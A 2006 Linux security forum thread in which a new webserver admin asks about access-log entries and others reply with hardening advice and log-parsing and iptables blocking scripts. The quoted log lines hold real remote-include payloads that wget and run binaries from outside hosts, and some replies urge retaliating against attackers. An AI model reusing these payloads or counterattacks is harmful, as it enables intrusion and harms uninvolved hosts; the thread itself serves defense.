Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here. |
06-10-2006, 11:17 PM
#1
Senior Member
Registered: Feb 2006
Location: Seattle, WA: USA
Distribution: Slackware 11.0
Posts: 1,191
How do I go about reporting an attempt to compromise my host?
OK, so I am about 6 months into Linux and I decide it was time to put up a webserver. Just out of curiosity, I review my access_log today and find some pretty interesting stuff. I am by no means an expert on all of this, but it appears that someone (multiple people actually), among other things, attempted to use injection to navigate to my /tmp directory to exploit its world-writable permissions to download and execute a script.
Code:
217.141.108.138 - - [04/Jun/2006:00:25:03 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du;chmod%20744%20m3du;./m3du%20217.127.64.53%208080;00;echo%20YYY;echo| HTTP/1.1" 404 287
217.141.108.138 - - [04/Jun/2006:00:25:05 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du;chmod%20744%20m3du;./m3du%20217.127.64.53%208080;00;echo%20YYY;echo| HTTP/1.1" 404 286
217.141.108.138 - - [04/Jun/2006:00:25:06 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du;chmod%20744%20m3du;./m3du%20217.127.64.53%208080;00;echo%20YYY;echo| HTTP/1.1" 404 293
217.141.108.138 - - [04/Jun/2006:00:25:08 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du;chmod%20744%20m3du;./m3du%20217.127.64.53%208080;00;echo%20YYY;echo| HTTP/1.1" 404 291
217.141.108.138 - - [04/Jun/2006:00:25:10 -0500] "POST /xmlrpc.php HTTP/1.1" 404 287
217.141.108.138 - - [04/Jun/2006:00:25:12 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 404 294
217.141.108.138 - - [04/Jun/2006:00:25:13 -0500] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 300
217.141.108.138 - - [04/Jun/2006:00:25:15 -0500] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 297
....
65.110.43.170 - - [07/Jun/2006:01:10:35 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 287
65.110.43.170 - - [07/Jun/2006:01:10:36 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 286
65.110.43.170 - - [07/Jun/2006:01:10:37 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 293
65.110.43.170 - - [07/Jun/2006:01:10:38 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 291
65.110.43.170 - - [07/Jun/2006:01:10:39 -0500] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 302
65.110.43.170 - - [07/Jun/2006:01:10:40 -0500] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo| HTTP/1.1" 404 297
65.110.43.170 - - [07/Jun/2006:01:10:42 -0500] "POST /xmlrpc.php HTTP/1.1" 404 287
65.110.43.170 - - [07/Jun/2006:01:10:44 -0500] "POST /blog/xmlrpc.php HTTP/1.1" 404 292
65.110.43.170 - - [07/Jun/2006:01:10:45 -0500] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 299
65.110.43.170 - - [07/Jun/2006:01:10:46 -0500] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 300
65.110.43.170 - - [07/Jun/2006:01:10:47 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 404 294
65.110.43.170 - - [07/Jun/2006:01:10:48 -0500] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 300
65.110.43.170 - - [07/Jun/2006:01:10:49 -0500] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 297
65.110.43.170 - - [07/Jun/2006:01:10:50 -0500] "POST /xmlrpc.php HTTP/1.1" 404 287
65.110.43.170 - - [07/Jun/2006:01:10:52 -0500] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 294
65.110.43.170 - - [07/Jun/2006:01:10:53 -0500] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 294
66.249.72.171 - - [07/Jun/2006:05:00:06 -0500] "GET /robots.txt HTTP/1.1" 404 287
IRC ports?
Code:
69.16.172.3 - - [01/Jun/2006:07:00:40 -0500] "CONNECT 69.16.172.2:6667 HTTP/1.0" 405 302
69.16.172.3 - - [01/Jun/2006:07:00:40 -0500] "POST http://69.16.172.2:6667/ HTTP/1.0" 405 299
I have no idea what this is, but it doesn't look too malicious.
Code:
213.203.248.196 - - [31/May/2006:17:42:17 -0500] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 303
213.203.248.196 - - [31/May/2006:17:42:17 -0500] "GET /adxmlrpc.php HTTP/1.0" 404 277
213.203.248.196 - - [31/May/2006:17:42:18 -0500] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 286
213.203.248.196 - - [31/May/2006:17:42:18 -0500] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 287
213.203.248.196 - - [31/May/2006:17:42:18 -0500] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 287
213.203.248.196 - - [31/May/2006:17:42:19 -0500] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 284
213.203.248.196 - - [31/May/2006:17:42:19 -0500] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 281
213.203.248.196 - - [31/May/2006:17:42:20 -0500] "GET /ads/adxmlrpc.php HTTP/1.0" 404 281
213.203.248.196 - - [31/May/2006:17:42:20 -0500] "GET /xmlrpc.php HTTP/1.0" 404 275
213.203.248.196 - - [31/May/2006:17:42:21 -0500] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 282
213.203.248.196 - - [31/May/2006:17:42:21 -0500] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 282
Are these hack attempts? Is there a way to tell if they were successful or not? I'm assuming all the 404's are a good thing, but then again, I am pretty new to this stuff. If these are hack attempts, I find it pretty amazing that so many people would be interested in my piddly little webserver with nothing important on it. Did I sleep with the wrong person's daughter or something?
If anyone could help me make sense of these logs, and give some advice on what I need to do from here, I would greatly appreciate it.
thanks for your time!
...drkstr
**edit**
oops, I forgot to ask my primary question.
Assuming this is an attempt to compromise my system, what kind of tools can I use to A) figure out who is doing it, and B) prevent them from doing it in the future?
thanks again!
**edit**
Last edited by drkstr; 06-11-2006 at 01:46 AM.
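Added example (not from the thread or its posters): an awk classifier for the three probe patterns quoted above (the Mambo/Joomla mosConfig_absolute_path remote-include, the xmlrpc.php scans, and the CONNECT/POST to port 6667), run over a constructed sample in the same Apache common log format. It groups hits by client IP and probe type together with the status the server answered, so the 404s (nothing served) are told apart from a 200 (a script actually ran, which is the case to investigate). The sample log and the documentation-range IPs in it are constructed.

```shell
#!/bin/sh
# Added example, not code from the LinuxQuestions thread. Assumes Apache common
# log format: $1 client IP, $6 "METHOD, $7 request target, $9 status code.

# Reads access_log lines on stdin; prints "<ip> <kind> <status> <count>" per group.
classify_probes() {
  awk '{
    ip = $1; req = $6 " " $7; status = $9; kind = ""
    # mosConfig_absolute_path pointed at a URL: Mambo/Joomla remote file include
    # xmlrpc.php / adxmlrpc.php: scan for the old PHP XML-RPC hole
    # CONNECT or absolute-URI POST to :6667: open-proxy check to reach IRC
    if (req ~ /mosConfig_absolute_path=http/) kind = "mambo-rfi"
    else if (req ~ /xmlrpc\.php/) kind = "xmlrpc-probe"
    else if ($6 == "\"CONNECT" || $7 ~ /^http:\/\/.*:6667\//) kind = "proxy-to-irc"
    if (kind != "") print ip, kind, status
  }' | sort | uniq -c | awk '{ print $2, $3, $4, $1 }'
}

# Keeps only probes the server answered with 2xx: these reached a script.
served_probes() {
  classify_probes | awk '$3 ~ /^2/'
}

# Constructed sample modelled on the thread's log lines (documentation IP ranges).
SAMPLE_LOG='192.0.2.10 - - [04/Jun/2006:00:25:03 -0500] "GET /index2.php?mosConfig_absolute_path=http://198.51.100.7/cmd.gif?&cmd=cd%20/tmp;wget%20198.51.100.7/m3du HTTP/1.1" 404 287
192.0.2.10 - - [04/Jun/2006:00:25:06 -0500] "GET /mambo/index2.php?mosConfig_absolute_path=http://198.51.100.7/cmd.gif? HTTP/1.1" 404 293
192.0.2.10 - - [04/Jun/2006:00:25:10 -0500] "POST /xmlrpc.php HTTP/1.1" 404 287
192.0.2.10 - - [04/Jun/2006:00:25:12 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 404 294
203.0.113.7 - - [01/Jun/2006:07:00:40 -0500] "CONNECT 198.51.100.2:6667 HTTP/1.0" 405 302
203.0.113.7 - - [01/Jun/2006:07:00:40 -0500] "POST http://198.51.100.2:6667/ HTTP/1.0" 405 299
198.51.100.20 - - [08/Jun/2006:03:12:44 -0500] "GET /site/index2.php?mosConfig_absolute_path=http://198.51.100.7/cmd.gif? HTTP/1.1" 200 1043
198.51.100.30 - - [07/Jun/2006:05:00:06 -0500] "GET /robots.txt HTTP/1.1" 404 287'

printf '%s\n' "$SAMPLE_LOG" | classify_probes
printf '%s\n' "$SAMPLE_LOG" | served_probes
```

On a real box replace the sample with `classify_probes < /var/log/apache/access_log`; any line served_probes prints is a request that reached a PHP script and deserves the process and /tmp checks from the next reply.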
06-11-2006, 10:36 AM
#2
Moderator
Registered: May 2001
Posts: 29,415
Quote:
Just out of curiosity, I review my access_log today
Ahhh... better review logs regularly. Achieve max mana by hardening the box first, regular updating and backups and using auditing tools like a file integrity checker (Aide, Samhain, md5deep or even tripwire), your distro's package manager (if it has verification functionality), Tiger, Chkrootkit, Rootkit Hunter and reporting tools like Logwatch, swatch etc, etc.
Quote:
it appears that someone (multiple people actually) among other things, attempted
Yes, it's always heartwarming to see that out of the gazillion boxen around they take interest in *yours*, innit? ;-p
Quote:
Are these hack attempts?
H^HCracking attempts, yes.
Quote:
Is there a way to tell if they were successful or not? I'm assuming all the 404's are a good thing
In general you would be looking for vulnerabilities in the webserver (or more likely applications running on top of it: PHP-based apps are notorious for being flawed), rogue processes that run with the UID of the webserver, binaries and scripts in accessible temp dirs (lsof), processes with "typical" string contents like wget (see mod_security), processes using files that are deleted (lsof), and to some lesser extent setuid root binaries in accessible temp dirs, rootkits. Yes, four-oh-fours are good.
Quote:
Assuming this is an attempt to compromise my system. What kind of tools can I use to A) figure out who is doing it, and B) prevent them from doing it in the future.
Tools and methods mentioned above. Prevention means taking away chances. This is best done starting with a box in pristine state. Check out the LQ FAQ: Security references, post #1 under securing and hardening. Best to read, draw a plan and discuss it.
06-11-2006, 12:40 PM
#3
Senior Member
Registered: Feb 2006
Location: Seattle, WA: USA
Distribution: Slackware 11.0
Posts: 1,191
Original Poster
Wow, the "LQ FAQ: Security references" looks like a great resource! Thanks for taking the time to compile all of that information. I see I have some reading to do, so I will post back if I can't figure something out.
Quote:
Ahhh... better review logs regularly.
Yes, I can see now that this could be an important step.
Thanks again for the information!
...drkstr
06-12-2006, 09:43 PM
#4
Member
Registered: Mar 2006
Distribution: debian sarge
Posts: 222
retaliate. hack the hackers. or ping the hell out of them. if it's done right, their systems will totally crash.
operator
06-12-2006, 10:29 PM
#6
Senior Member
Registered: Dec 2005
Location: Brisbane, Australia
Distribution: Slackware64 14.0
Posts: 4,141
Quote:
Originally Posted by operator10001
retaliate. hack the hackers. or ping the hell out of them. if it's done right, their systems will totally crash.
operator
And if they're just unwittingly hosting somebody else's bot, you've left yourself open to accusations of cracking for no good reason. Some of the ISPs here put no-scanning, no-cracking, no-spamming type clauses in their usage policy, so you could wind up cut off from the internet. That would definitely hurt me.
06-12-2006, 11:47 PM
#7
Member
Registered: Mar 2006
Distribution: debian sarge
Posts: 222
oh ok. why didn't I think of that? those rules are very seldom enforced. the net is an anarchy.
06-13-2006, 01:14 AM
#8
Member
Registered: Mar 2006
Distribution: BackTrack, RHEL, FC, CentOS, IPCop, Ubuntu, 64Studio, Elive, Dream Linux, Trix Box
Posts: 310
Best way:
Create an automated response to abuse@XXXX,
which is to be picked from the log files automatically.
(Force them to look into the matter by sending as many mails as there are log entries.)
06-13-2006, 01:19 AM
#9
Senior Member
Registered: Feb 2006
Location: Seattle, WA: USA
Distribution: Slackware 11.0
Posts: 1,191
Original Poster
Thanks for the advice, but I would rather spend my time figuring out how to secure my own box instead of figuring out how to crack some lamo script kiddie's box. Not that I am against your idea; in fact I think it would be sweet, sweet justice. I just think I would benefit more from spending the time to learn good security techniques. Maybe when I am more knowledgeable in this topic I can figure out a way to set up countermeasures to route their own commands back to them. I would find it pretty hysterical if I got a script kiddie to try and hack his own box without realizing it.
regards,
...drkstr
06-13-2006, 01:34 AM
#10
Member
Registered: Nov 2005
Location: Land of Linux :: Finland
Distribution: Pop!_OS && Windows 10 && Arch Linux
Posts: 831
You could patch your iptables/kernel with the mirror target and use it temporarily when you are getting hits to an ssh port.
06-13-2006, 01:42 AM
#11
Member
Registered: Mar 2006
Distribution: BackTrack, RHEL, FC, CentOS, IPCop, Ubuntu, 64Studio, Elive, Dream Linux, Trix Box
Posts: 310
Hello everyone,
@//////,
It took a lot of time to measure the "/"s.
Hey, but what's that mirroring /|\ thing?
06-13-2006, 01:45 AM
#12
Member
Registered: Mar 2006
Distribution: BackTrack, RHEL, FC, CentOS, IPCop, Ubuntu, 64Studio, Elive, Dream Linux, Trix Box
Posts: 310
Hi guys,
I had heard somewhere that we could pretend to be NT boxes over the Internet; does anybody have an idea? Also, I had heard that there are some daemons which pretend to be cracked, crashed and collapsed and then notify us about everything that the cracker did. I found some, but they were the oldest possible versions, which are of no use now (kernel 2.0.xx).
06-13-2006, 03:00 AM
#13
Member
Registered: Nov 2005
Location: Land of Linux :: Finland
Distribution: Pop!_OS && Windows 10 && Arch Linux
Posts: 831
That mirror target switches the source and destination fields in packets and resends them, so if someone tries to brute-force port 22 and you use the mirror target, he will be cracking himself.
06-13-2006, 03:04 AM
#14
Senior Member
Registered: Feb 2006
Location: Seattle, WA: USA
Distribution: Slackware 11.0
Posts: 1,191
Original Poster
Quote:
Create an automated response for abuse@XXXX
which is to be picked from log files automatically.
Good idea.
I was hoping to try and set something up that would automatically detect intrusion attempts and log the IP in a &^#@* list. As a countermeasure, I could then hopefully configure my iptables to check this list prior to any rule checking and route all traffic back to them if it finds a match in the list.
Does anyone know if it is possible to do this with iptables?
thanks for the help!
...drkstr
06-13-2006, 03:32 AM
#15
Member
Registered: Mar 2006
Distribution: BackTrack, RHEL, FC, CentOS, IPCop, Ubuntu, 64Studio, Elive, Dream Linux, Trix Box
Posts: 310
Hello darkstar,
We obviously can do it with the simplest of scripts.
I haven't created it yet, but we can grep as follows:
To check root user ssh failures:
Quote:
grep "Failed password for root" /var/log/messages | gawk -F: '{print $4}' | gawk -F" " '{print $6}' | sort | uniq -c
To check illegal usernames such as "test":
Quote:
grep "Failed password for illegal" /var/log/messages | gawk -F: '{print $4}' | gawk -F" " '{print $8}' | sort | uniq -c
To check for ssh scans:
Quote:
grep "Did not receive identification string from" /var/log/messages | gawk '{print $12}' | sort | uniq -c
The file may be /var/log/messages or /var/log/secure;
other things remain the same.
And we get a good list (superb candidates). Redirect this to a list and then:
iptables -I INPUT -s xx.x.x.x -j DROP
The risk involved is: what if you enter wrong passwords yourself?
So better make it count the no. of tries.
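Added example (not from the thread or its posters) that does what the post above and the original poster's "log the IP in a list, then feed it to iptables" idea (#14) describe in one pass: it merges the three greps, counts failures per source IP, applies the "count the no. of tries" threshold so a couple of your own typos never make the list, and prints the DROP rules for review instead of running them. It assumes syslog-style sshd lines as found in /var/log/messages or /var/log/secure; the sample log, hostnames and documentation-range IPs are constructed.

```shell
#!/bin/sh
# Added example, not code from the LinuxQuestions thread. Assumes sshd log lines
# in syslog format, e.g. "... sshd[pid]: Failed password for root from 1.2.3.4 ...".

# Reads auth log lines on stdin; prints "<count> <ip>" for every source IP that
# failed at least THRESHOLD times (default 5). The IP is taken as the word after
# "from", which works for all three message forms instead of a fixed field number.
ssh_offenders() {
  threshold=${1:-5}
  awk -v min="$threshold" '
    /Failed password for|Did not receive identification string from/ {
      for (i = 1; i < NF; i++) if ($i == "from") { hits[$(i + 1)]++; break }
    }
    END { for (ip in hits) if (hits[ip] >= min) print hits[ip], ip }
  ' | sort -rn
}

# Turns the offender list into iptables commands; printed, not executed, so the
# list can be checked (your own IP may be on it) before anything gets blocked.
drop_rules() {
  ssh_offenders "$1" | awk '{ print "iptables -I INPUT -s " $2 " -j DROP" }'
}

# Constructed sample: 6 failures from 203.0.113.5, 2 from 198.51.100.9 (a real
# user mistyping, then succeeding) and one banner-less scan from 192.0.2.77.
SAMPLE_AUTH='Jun 13 01:20:01 www sshd[4011]: Failed password for root from 203.0.113.5 port 40122 ssh2
Jun 13 01:20:03 www sshd[4011]: Failed password for root from 203.0.113.5 port 40122 ssh2
Jun 13 01:20:05 www sshd[4013]: Failed password for illegal user test from 203.0.113.5 port 40130 ssh2
Jun 13 01:20:07 www sshd[4013]: Failed password for illegal user admin from 203.0.113.5 port 40130 ssh2
Jun 13 01:20:09 www sshd[4015]: Failed password for illegal user guest from 203.0.113.5 port 40141 ssh2
Jun 13 01:20:11 www sshd[4015]: Failed password for root from 203.0.113.5 port 40141 ssh2
Jun 13 02:02:40 www sshd[4102]: Failed password for alice from 198.51.100.9 port 51000 ssh2
Jun 13 02:02:44 www sshd[4102]: Failed password for alice from 198.51.100.9 port 51000 ssh2
Jun 13 02:02:50 www sshd[4102]: Accepted password for alice from 198.51.100.9 port 51000 ssh2
Jun 13 03:30:00 www sshd[4200]: Did not receive identification string from 192.0.2.77'

printf '%s\n' "$SAMPLE_AUTH" | ssh_offenders 5
printf '%s\n' "$SAMPLE_AUTH" | drop_rules 5
```

With the threshold at 5 only 203.0.113.5 is listed; at 1 all three sources appear, which is why the count matters before anything goes into iptables.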